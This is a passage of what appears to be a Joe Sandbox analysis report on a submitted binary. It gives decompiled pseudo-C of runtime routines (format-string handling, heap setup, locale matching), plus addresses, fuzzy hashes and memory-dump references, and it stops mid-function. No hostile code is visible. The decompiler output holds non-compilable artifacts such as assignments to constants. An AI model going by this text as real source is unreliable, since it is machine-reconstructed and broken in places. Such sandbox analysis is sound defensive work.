                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 009FD80B Relevance: 1.5, Strings: 1, Instructions: 216COMMONCrypto
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                                                          			E009FD80B(intOrPtr* __ecx) {
				char _v6;
				char _v8;
				signed int _v12;
				void* __ebx;
				char _t51;
				signed int _t52;
				void* _t53;
				signed int _t54;
				signed char _t56;
				signed char _t58;
				signed int _t59;
				void* _t61;
				signed char _t66;
				signed char _t69;
				signed char _t76;
				signed char _t78;
				signed int _t80;
				signed int _t82;
				signed int _t83;
				unsigned int _t89;
				signed int _t90;
				signed int* _t91;
				void* _t93;
				signed int _t95;
				unsigned int _t97;
				signed char _t99;
				void* _t107;
				intOrPtr _t110;
				void* _t114;
				intOrPtr* _t117;
				void* _t119;
				void* _t120;
				void* _t122;
				void* _t123;

				_push(__ecx);
				_push(__ecx);
				_t117 = __ecx;
				_t93 = 0x58;
				_t51 =  *((char*)(__ecx + 0x31));
				_t122 = _t51 - 0x64;
				if(_t122 > 0) {
					__eflags = _t51 - 0x70;
					if(__eflags > 0) {
						_t52 = _t51 - 0x73;
						__eflags = _t52;
						if(_t52 == 0) {
							L9:
							_t53 = E009FDF06(_t117);
							L10:
							if(_t53 != 0) {
								__eflags =  *(_t117 + 0x30);
								if( *(_t117 + 0x30) != 0) {
									L70:
									_t54 = 1;
									L71:
									return _t54;
								}
								_t95 = 0;
								_v8 = 0;
								_v6 = 0;
								_t89 =  *(_t117 + 0x20);
								_v12 = 0;
								_t56 = _t89 >> 4;
								__eflags = 1 & _t56;
								if((1 & _t56) == 0) {
									L45:
									_t110 =  *((intOrPtr*)(_t117 + 0x31));
									__eflags = _t110 - 0x78;
									if(_t110 == 0x78) {
										L47:
										_t58 = _t89 >> 5;
										__eflags = _t58 & 0x00000001;
										if((_t58 & 0x00000001) == 0) {
											L49:
											_t90 = 0;
											__eflags = 0;
											L50:
											__eflags = _t110 - 0x61;
											if(_t110 == 0x61) {
												L53:
												_t59 = 1;
												L54:
												__eflags = _t90;
												if(_t90 != 0) {
													L56:
													 *((char*)(_t119 + _t95 - 4)) = 0x30;
													__eflags = _t110 - 0x58;
													if(_t110 == 0x58) {
														L59:
														0x78 = 0x58;
														L60:
														 *((char*)(_t119 + _t95 - 3)) = 0x78;
														_t95 = _t95 + 2;
														__eflags = _t95;
														_v12 = _t95;
														L61:
														_t91 = _t117 + 0x18;
														_t61 = _t117 + 0x448;
														_t114 =  *((intOrPtr*)(_t117 + 0x24)) -  *((intOrPtr*)(_t117 + 0x38)) - _t95;
														__eflags =  *(_t117 + 0x20) & 0x0000000c;
														if(( *(_t117 + 0x20) & 0x0000000c) == 0) {
															E009FD171(_t61, 0x20, _t114, _t91);
															_t95 = _v12;
															_t120 = _t120 + 0x10;
														}
														_push(_t117 + 0xc);
														E009FE09C(_t117 + 0x448,  &_v8, _t95, _t91);
														_t97 =  *(_t117 + 0x20);
														_t66 = _t97 >> 3;
														__eflags = _t66 & 0x00000001;
														if((_t66 & 0x00000001) != 0) {
															_t99 = _t97 >> 2;
															__eflags = _t99 & 0x00000001;
															if((_t99 & 0x00000001) == 0) {
																E009FD171(_t117 + 0x448, 0x30, _t114, _t91);
																_t120 = _t120 + 0x10;
															}
														}
														E009FDFF7(_t117, _t110, 0);
														__eflags =  *_t91;
														if( *_t91 >= 0) {
															_t69 =  *(_t117 + 0x20) >> 2;
															__eflags = _t69 & 0x00000001;
															if((_t69 & 0x00000001) != 0) {
																E009FD171(_t117 + 0x448, 0x20, _t114, _t91);
															}
														}
														goto L70;
													}
													__eflags = _t110 - 0x41;
													if(_t110 == 0x41) {
														goto L59;
													}
													goto L60;
												}
												__eflags = _t59;
												if(_t59 == 0) {
													goto L61;
												}
												goto L56;
											}
											__eflags = _t110 - 0x41;
											if(_t110 == 0x41) {
												goto L53;
											}
											_t59 = 0;
											goto L54;
										}
										_t90 = 1;
										goto L50;
									}
									__eflags = _t110 - 0x58;
									if(_t110 != 0x58) {
										goto L49;
									}
									goto L47;
								}
								_t76 = _t89 >> 6;
								__eflags = 1 & _t76;
								if((1 & _t76) == 0) {
									__eflags = 1 & _t89;
									if((1 & _t89) == 0) {
										_t78 = _t89 >> 1;
										__eflags = 1 & _t78;
										if((1 & _t78) != 0) {
											_v8 = 0x20;
											_t95 = 1;
											_v12 = 1;
										}
										goto L45;
									}
									_v8 = 0x2b;
									L42:
									_t95 = 1;
									_v12 = 1;
									goto L45;
								}
								_v8 = 0x2d;
								goto L42;
							}
							L11:
							_t54 = 0;
							goto L71;
						}
						_t80 = _t52;
						__eflags = _t80;
						if(__eflags == 0) {
							L28:
							_push(0);
							_push(0xa);
							L29:
							_t53 = E009FDD0A(_t117, _t107, __eflags);
							goto L10;
						}
						__eflags = _t80 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t53 = E009FDEEE(__ecx);
						goto L10;
					}
					__eflags = _t51 - 0x67;
					if(_t51 <= 0x67) {
						L30:
						_t53 = E009FDB26(0, _t117);
						goto L10;
					}
					__eflags = _t51 - 0x69;
					if(_t51 == 0x69) {
						L27:
						_t2 = _t117 + 0x20;
						 *_t2 =  *(_t117 + 0x20) | 0x00000010;
						__eflags =  *_t2;
						goto L28;
					}
					__eflags = _t51 - 0x6e;
					if(_t51 == 0x6e) {
						_t53 = E009FDE5B(__ecx, _t107);
						goto L10;
					}
					__eflags = _t51 - 0x6f;
					if(_t51 != 0x6f) {
						goto L11;
					}
					_t53 = E009FDECF(__ecx);
					goto L10;
				}
				if(_t122 == 0) {
					goto L27;
				}
				_t123 = _t51 - _t93;
				if(_t123 > 0) {
					_t82 = _t51 - 0x5a;
					__eflags = _t82;
					if(_t82 == 0) {
						_t53 = E009FDACC(__ecx);
						goto L10;
					}
					_t83 = _t82 - 7;
					__eflags = _t83;
					if(_t83 == 0) {
						goto L30;
					}
					__eflags = _t83;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t53 = E009FDC77(0, _t117, _t107, __eflags, 0);
					goto L10;
				}
				if(_t123 == 0) {
					_push(1);
					goto L13;
				}
				if(_t51 == 0x41) {
					goto L30;
				}
				if(_t51 == 0x43) {
					goto L17;
				}
				if(_t51 <= 0x44) {
					goto L11;
				}
				if(_t51 <= 0x47) {
					goto L30;
				}
				if(_t51 != 0x53) {
					goto L11;
				}
				goto L9;
			}





































                                                                                                                                                                          0x009fd810
                                                                                                                                                                          0x009fd811
                                                                                                                                                                          0x009fd814
                                                                                                                                                                          0x009fd81a
                                                                                                                                                                          0x009fd81b
                                                                                                                                                                          0x009fd81f
                                                                                                                                                                          0x009fd822
                                                                                                                                                                          0x009fd890
                                                                                                                                                                          0x009fd893
                                                                                                                                                                          0x009fd8e2
                                                                                                                                                                          0x009fd8e2
                                                                                                                                                                          0x009fd8e5
                                                                                                                                                                          0x009fd851
                                                                                                                                                                          0x009fd853
                                                                                                                                                                          0x009fd858
                                                                                                                                                                          0x009fd85a
                                                                                                                                                                          0x009fd900
                                                                                                                                                                          0x009fd903
                                                                                                                                                                          0x009fda37
                                                                                                                                                                          0x009fda37
                                                                                                                                                                          0x009fda39
                                                                                                                                                                          0x009fda3c
                                                                                                                                                                          0x009fda3c
                                                                                                                                                                          0x009fd909
                                                                                                                                                                          0x009fd90b
                                                                                                                                                                          0x009fd90f
                                                                                                                                                                          0x009fd914
                                                                                                                                                                          0x009fd91a
                                                                                                                                                                          0x009fd91d
                                                                                                                                                                          0x009fd920
                                                                                                                                                                          0x009fd922
                                                                                                                                                                          0x009fd953
                                                                                                                                                                          0x009fd953
                                                                                                                                                                          0x009fd956
                                                                                                                                                                          0x009fd959
                                                                                                                                                                          0x009fd960
                                                                                                                                                                          0x009fd962
                                                                                                                                                                          0x009fd965
                                                                                                                                                                          0x009fd967
                                                                                                                                                                          0x009fd96d
                                                                                                                                                                          0x009fd96d
                                                                                                                                                                          0x009fd96d
                                                                                                                                                                          0x009fd96f
                                                                                                                                                                          0x009fd96f
                                                                                                                                                                          0x009fd972
                                                                                                                                                                          0x009fd97d
                                                                                                                                                                          0x009fd97d
                                                                                                                                                                          0x009fd97f
                                                                                                                                                                          0x009fd97f
                                                                                                                                                                          0x009fd981
                                                                                                                                                                          0x009fd987
                                                                                                                                                                          0x009fd987
                                                                                                                                                                          0x009fd98c
                                                                                                                                                                          0x009fd98f
                                                                                                                                                                          0x009fd99a
                                                                                                                                                                          0x009fd99c
                                                                                                                                                                          0x009fd99d
                                                                                                                                                                          0x009fd99d
                                                                                                                                                                          0x009fd9a1
                                                                                                                                                                          0x009fd9a1
                                                                                                                                                                          0x009fd9a4
                                                                                                                                                                          0x009fd9a7
                                                                                                                                                                          0x009fd9ab
                                                                                                                                                                          0x009fd9b1
                                                                                                                                                                          0x009fd9b7
                                                                                                                                                                          0x009fd9b9
                                                                                                                                                                          0x009fd9bd
                                                                                                                                                                          0x009fd9c4
                                                                                                                                                                          0x009fd9c9
                                                                                                                                                                          0x009fd9cc
                                                                                                                                                                          0x009fd9cc
                                                                                                                                                                          0x009fd9d2
                                                                                                                                                                          0x009fd9df
                                                                                                                                                                          0x009fd9e4
                                                                                                                                                                          0x009fd9e9
                                                                                                                                                                          0x009fd9ec
                                                                                                                                                                          0x009fd9ee
                                                                                                                                                                          0x009fd9f0
                                                                                                                                                                          0x009fd9f3
                                                                                                                                                                          0x009fd9f6
                                                                                                                                                                          0x009fda03
                                                                                                                                                                          0x009fda08
                                                                                                                                                                          0x009fda08
                                                                                                                                                                          0x009fd9f6
                                                                                                                                                                          0x009fda0f
                                                                                                                                                                          0x009fda14
                                                                                                                                                                          0x009fda17
                                                                                                                                                                          0x009fda1c
                                                                                                                                                                          0x009fda1f
                                                                                                                                                                          0x009fda21
                                                                                                                                                                          0x009fda2e
                                                                                                                                                                          0x009fda33
                                                                                                                                                                          0x009fda21
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fda36
                                                                                                                                                                          0x009fd991
                                                                                                                                                                          0x009fd994
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fd996
                                                                                                                                                                          0x009fd983
                                                                                                                                                                          0x009fd985
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fd985
                                                                                                                                                                          0x009fd974
                                                                                                                                                                          0x009fd977
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fd979
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fd979
                                                                                                                                                                          0x009fd969
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fd969
                                                                                                                                                                          0x009fd95b
                                                                                                                                                                          0x009fd95e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fd95e
                                                                                                                                                                          0x009fd926
                                                                                                                                                                          0x009fd929
                                                                                                                                                                          0x009fd92b
                                                                                                                                                                          0x009fd933
                                                                                                                                                                          0x009fd935
                                                                                                                                                                          0x009fd944
                                                                                                                                                                          0x009fd946
                                                                                                                                                                          0x009fd948
                                                                                                                                                                          0x009fd94a
                                                                                                                                                                          0x009fd94e
                                                                                                                                                                          0x009fd950
                                                                                                                                                                          0x009fd950
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fd948
                                                                                                                                                                          0x009fd937
                                                                                                                                                                          0x009fd93b
                                                                                                                                                                          0x009fd93b
                                                                                                                                                                          0x009fd93d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fd93d
                                                                                                                                                                          0x009fd92d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fd92d
                                                                                                                                                                          0x009fd860
                                                                                                                                                                          0x009fd860
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fd860
                                                                                                                                                                          0x009fd8ec
                                                                                                                                                                          0x009fd8ec
                                                                                                                                                                          0x009fd8ef
                                                                                                                                                                          0x009fd8c1
                                                                                                                                                                          0x009fd8c1
                                                                                                                                                                          0x009fd8c2
                                                                                                                                                                          0x009fd8c4
                                                                                                                                                                          0x009fd8c6
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fd8c6
                                                                                                                                                                          0x009fd8f1
                                                                                                                                                                          0x009fd8f4
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fd8fa
                                                                                                                                                                          0x009fd869
                                                                                                                                                                          0x009fd869
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fd869
                                                                                                                                                                          0x009fd895
                                                                                                                                                                          0x009fd8d8
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fd8d8
                                                                                                                                                                          0x009fd897
                                                                                                                                                                          0x009fd89a
                                                                                                                                                                          0x009fd8cd
                                                                                                                                                                          0x009fd8cf
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fd8cf
                                                                                                                                                                          0x009fd89c
                                                                                                                                                                          0x009fd89f
                                                                                                                                                                          0x009fd8bd
                                                                                                                                                                          0x009fd8bd
                                                                                                                                                                          0x009fd8bd
                                                                                                                                                                          0x009fd8bd
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fd8bd
                                                                                                                                                                          0x009fd8a1
                                                                                                                                                                          0x009fd8a4
                                                                                                                                                                          0x009fd8b6
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fd8b6
                                                                                                                                                                          0x009fd8a6
                                                                                                                                                                          0x009fd8a9
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fd8ad
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fd8ad
                                                                                                                                                                          0x009fd824
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fd82a
                                                                                                                                                                          0x009fd82c
                                                                                                                                                                          0x009fd86d
                                                                                                                                                                          0x009fd86d
                                                                                                                                                                          0x009fd870
                                                                                                                                                                          0x009fd889
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fd889
                                                                                                                                                                          0x009fd872
                                                                                                                                                                          0x009fd872
                                                                                                                                                                          0x009fd875
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fd878
                                                                                                                                                                          0x009fd87b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fd87d
                                                                                                                                                                          0x009fd880
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fd880
                                                                                                                                                                          0x009fd82e
                                                                                                                                                                          0x009fd867
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fd867
                                                                                                                                                                          0x009fd833
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fd83c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fd841
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fd846
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fd84f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000

                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 0
                                                                                                                                                                          • API String ID: 0-4108050209
                                                                                                                                                                          • Opcode ID: 288b069238bcb175a08d90be2d5c7c904f29ebdf58067a430d046a089f8ffe63
                                                                                                                                                                          • Instruction ID: eb23db545ae48a714e4e12e648f0d900d21c10eea8a50a05e9b5b3829830cb07
                                                                                                                                                                          • Opcode Fuzzy Hash: 288b069238bcb175a08d90be2d5c7c904f29ebdf58067a430d046a089f8ffe63
                                                                                                                                                                          • Instruction Fuzzy Hash: A851D87060764CA6DB3C8A6888967BE77AF9F42384F08091ED787DB282C695DD84C306
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A0EED0 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E00A0EED0() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0xa46904 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}




                                                                                                                                                                          0x00a0eed0
                                                                                                                                                                          0x00a0eed8
                                                                                                                                                                          0x00a0eee0

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HeapProcess
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 54951025-0
                                                                                                                                                                          • Opcode ID: 1661cd2755049bc2181e53b3207017786b741d201a6e17bbcea486946dc6a77d
                                                                                                                                                                          • Instruction ID: 2800e15c0ab95149d658d64279108226c18476b7e821ecf77384317cdba7c4e0
                                                                                                                                                                          • Opcode Fuzzy Hash: 1661cd2755049bc2181e53b3207017786b741d201a6e17bbcea486946dc6a77d
                                                                                                                                                                          • Instruction Fuzzy Hash: 07A01234102200CB4300CFF55A046083598658B681300C0149000C1121E73040414601
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A09A19 Relevance: .6, Instructions: 637COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: d5d8e9275897bd40da85dc1e5105ad0d25f9e0151f85f98a1d5492ee3abdeb29
                                                                                                                                                                          • Instruction ID: 3b6309dc3765f151a74c96c4c7da09032016c84bf2b7af1f258ab724af4ae523
                                                                                                                                                                          • Opcode Fuzzy Hash: d5d8e9275897bd40da85dc1e5105ad0d25f9e0151f85f98a1d5492ee3abdeb29
                                                                                                                                                                          • Instruction Fuzzy Hash: 7E323272D69F054DD7239634DC3233AA249AFB73C4F15D727E81AB5AAAEF28C4834101
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A0DDBE Relevance: .3, Instructions: 327COMMONCrypto
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 73%
                                                                                                                                                                          			E00A0DDBE(void* __ebx, void* __ecx, intOrPtr* __edx, void* __eflags, intOrPtr* _a4) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v32;
				char _v36;
				char _v136;
				signed int _v140;
				intOrPtr* _v168;
				signed int _v180;
				char _v272;
				char _v420;
				signed int _v448;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t93;
				signed int _t97;
				void* _t99;
				intOrPtr _t111;
				void* _t113;
				signed int _t115;
				signed int _t119;
				intOrPtr _t127;
				intOrPtr _t137;
				signed int _t139;
				signed int _t140;
				signed int _t143;
				intOrPtr _t146;
				intOrPtr _t149;
				intOrPtr _t150;
				intOrPtr _t152;
				void* _t161;
				intOrPtr _t163;
				void* _t166;
				void* _t168;
				intOrPtr _t169;
				intOrPtr _t170;
				signed int _t172;
				void* _t173;
				void* _t175;
				intOrPtr* _t176;
				signed int _t196;
				intOrPtr* _t198;
				intOrPtr* _t209;
				signed int _t211;
				intOrPtr* _t212;
				intOrPtr* _t217;
				intOrPtr* _t220;
				void* _t221;
				intOrPtr* _t224;
				signed int _t227;
				intOrPtr* _t229;
				intOrPtr* _t231;
				intOrPtr* _t233;
				void* _t235;
				void* _t236;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr* _t239;
				intOrPtr* _t242;
				intOrPtr* _t243;
				signed int _t244;
				void* _t245;
				void* _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				void* _t251;
				signed int _t252;

				_t234 = __edx;
				_t171 = __ebx;
				_t93 =  *0xa44bac; // 0x96877b9b
				_v8 = _t93 ^ _t248;
				_t242 = _a4;
				_t245 = E00A041D0(__ecx, __edx);
				asm("sbb ecx, ecx");
				_t97 = E00A06539(_t242, ( ~( *(_t245 + 0x64)) & 0xfffff005) + 0x1002,  &_v136, 0x40);
				if(_t97 != 0) {
					_push(__ebx);
					_t99 = E00A0B1C4(_t242, _t245,  *((intOrPtr*)(_t245 + 0x54)),  &_v136);
					_t172 = 0;
					_v140 = 0;
					if(_t99 != 0) {
						L15:
						if(( *(_t245 + 0x58) & 0x00000300) == 0x300) {
							L47:
							_t105 =  !( *(_t245 + 0x58) >> 2) & 0x00000001;
							goto L48;
						} else {
							asm("sbb ecx, ecx");
							if(E00A06539(_t242, ( ~( *(_t245 + 0x60)) & 0xfffff002) + 0x1001,  &_v136, 0x40) != 0) {
								if(E00A0B1C4(_t242, _t245,  *((intOrPtr*)(_t245 + 0x50)),  &_v136) != 0) {
									goto L47;
								} else {
									_t196 =  *(_t245 + 0x58) | 0x00000200;
									 *(_t245 + 0x58) = _t196;
									if( *(_t245 + 0x60) == _t172) {
										if( *((intOrPtr*)(_t245 + 0x5c)) == _t172) {
											L43:
											_t62 = _t245 + 0x2a0; // 0x2a0
											_t234 = _t62;
											 *(_t245 + 0x58) = _t196 | 0x00000100;
											if( *_t62 != _t172) {
												goto L47;
											} else {
												_t198 = _t242;
												_t173 = _t198 + 2;
												do {
													_t111 =  *_t198;
													_t198 = _t198 + 2;
												} while (_t111 != _v140);
												goto L46;
											}
										} else {
											_t239 =  *((intOrPtr*)(_t245 + 0x50));
											_t175 = _t239 + 2;
											do {
												_t146 =  *_t239;
												_t239 = _t239 + 2;
											} while (_t146 != _v140);
											_t241 = _t239 - _t175 >> 1;
											if(_t239 - _t175 >> 1 !=  *((intOrPtr*)(_t245 + 0x5c))) {
												_t172 = 0;
												goto L43;
											} else {
												if(E00A0E253(_t175, _t196, _t241, _t242, _t242) != 0) {
													L38:
													 *(_t245 + 0x58) =  *(_t245 + 0x58) | 0x00000100;
													_t59 = _t245 + 0x2a0; // 0x2a0
													_t234 = _t59;
													if( *_t59 != 0) {
														goto L47;
													} else {
														_t220 = _t242;
														_t173 = _t220 + 2;
														do {
															_t149 =  *_t220;
															_t220 = _t220 + 2;
														} while (_t149 != _v140);
														goto L46;
													}
												} else {
													_t176 =  *((intOrPtr*)(_t245 + 0x50));
													_t234 = 0;
													_t221 = _t176 + 2;
													do {
														_t150 =  *_t176;
														_t176 = _t176 + 2;
													} while (_t150 != 0);
													if(E00A0DD8A( *((intOrPtr*)(_t245 + 0x50))) == _t176 - _t221 >> 1) {
														goto L47;
													} else {
														goto L38;
													}
												}
											}
										}
									} else {
										_t45 = _t245 + 0x2a0; // 0x2a0
										_t234 = _t45;
										 *(_t245 + 0x58) = _t196 | 0x00000100;
										if( *_t45 != _t172) {
											goto L47;
										} else {
											_t224 = _t242;
											_t173 = _t224 + 2;
											do {
												_t152 =  *_t224;
												_t224 = _t224 + 2;
											} while (_t152 != _v140);
											L46:
											_t200 = _t198 - _t173 >> 1;
											_push((_t198 - _t173 >> 1) + 1);
											_t113 = E00A0B4B3(_t234, 0x55, _t242);
											_t252 = _t251 + 0x10;
											if(_t113 != 0) {
												_t172 = 0;
												goto L51;
											} else {
												goto L47;
											}
										}
									}
								}
							} else {
								 *(_t245 + 0x58) = _t172;
								goto L18;
							}
						}
					} else {
						asm("sbb eax, eax");
						if(E00A06539(_t242, ( ~( *(_t245 + 0x60)) & 0xfffff002) + 0x1001,  &_v136, 0x40) != 0) {
							_t161 = E00A0B1C4(_t242, _t245,  *((intOrPtr*)(_t245 + 0x50)),  &_v136);
							_t227 =  *(_t245 + 0x58);
							if(_t161 != 0) {
								if((_t227 & 0x00000002) != 0) {
									goto L15;
								} else {
									if( *((intOrPtr*)(_t245 + 0x5c)) == 0) {
										L19:
										if(( *(_t245 + 0x58) & 0x00000001) != 0 || E00A0E253(_t172, _t227, _t234, _t242, _t242) == 0) {
											goto L15;
										} else {
											 *(_t245 + 0x58) =  *(_t245 + 0x58) | 0x00000001;
											_t229 = _t242;
											_t234 = _t229 + 2;
											do {
												_t163 =  *_t229;
												_t229 = _t229 + 2;
											} while (_t163 != _t172);
											goto L14;
										}
									} else {
										_t168 = E00A12360(0, _t242, _t245,  *((intOrPtr*)(_t245 + 0x50)),  &_v136,  *((intOrPtr*)(_t245 + 0x5c)));
										_t251 = _t251 + 0xc;
										if(_t168 != 0) {
											goto L19;
										} else {
											 *(_t245 + 0x58) =  *(_t245 + 0x58) | 0x00000002;
											_t231 = _t242;
											_t234 = _t231 + 2;
											do {
												_t169 =  *_t231;
												_t231 = _t231 + 2;
											} while (_t169 != 0);
											goto L14;
										}
									}
								}
							} else {
								 *(_t245 + 0x58) = _t227 | 0x00000304;
								_t233 = _t242;
								_t234 = _t233 + 2;
								do {
									_t170 =  *_t233;
									_t233 = _t233 + 2;
								} while (_t170 != 0);
								L14:
								_t200 = _t229 - _t234 >> 1;
								_push((_t229 - _t234 >> 1) + 1);
								_t29 = _t245 + 0x2a0; // 0x2a0
								_t166 = E00A0B4B3(_t29, 0x55, _t242);
								_t252 = _t251 + 0x10;
								if(_t166 != 0) {
									L51:
									_push(_t172);
									_push(_t172);
									_push(_t172);
									_push(_t172);
									_push(_t172);
									E009FCBFC();
									asm("int3");
									_push(_t248);
									_t249 = _t252;
									_t115 =  *0xa44bac; // 0x96877b9b
									_v180 = _t115 ^ _t249;
									_push(_t245);
									_push(_t242);
									_t243 = _v168;
									_t246 = E00A041D0(_t200, _t234);
									asm("sbb ecx, ecx");
									_t119 = E00A06539(_t243, ( ~( *(_t246 + 0x60)) & 0xfffff002) + 0x1001,  &_v420, 0x78);
									if(_t119 != 0) {
										if(E00A0B1C4(_t243, _t246,  *((intOrPtr*)(_t246 + 0x50)),  &_v272) != 0) {
											L58:
											_t125 =  !( *(_t246 + 0x58) >> 2) & 0x00000001;
											goto L59;
										} else {
											_t209 = _t243;
											_push(_t172);
											_t234 = _t209 + 2;
											do {
												_t127 =  *_t209;
												_t209 = _t209 + 2;
											} while (_t127 != 0);
											_t211 = _t209 - _t234 >> 1;
											_push(_t211 + 1);
											_t79 = _t246 + 0x2a0; // 0x2a0
											if(E00A0B4B3(_t79, 0x55, _t243) != 0) {
												_push(0);
												_push(0);
												_push(0);
												_push(0);
												_push(0);
												E009FCBFC();
												asm("int3");
												_push(_t249);
												_push(_t211);
												_push(_t246);
												_t247 = _v448;
												_push(_t243);
												if(_t247 == 0) {
													L87:
													_push(2);
													_push( &_v36);
													_push(0x20001004);
												} else {
													_t244 = 0;
													if( *_t247 == 0) {
														goto L87;
													} else {
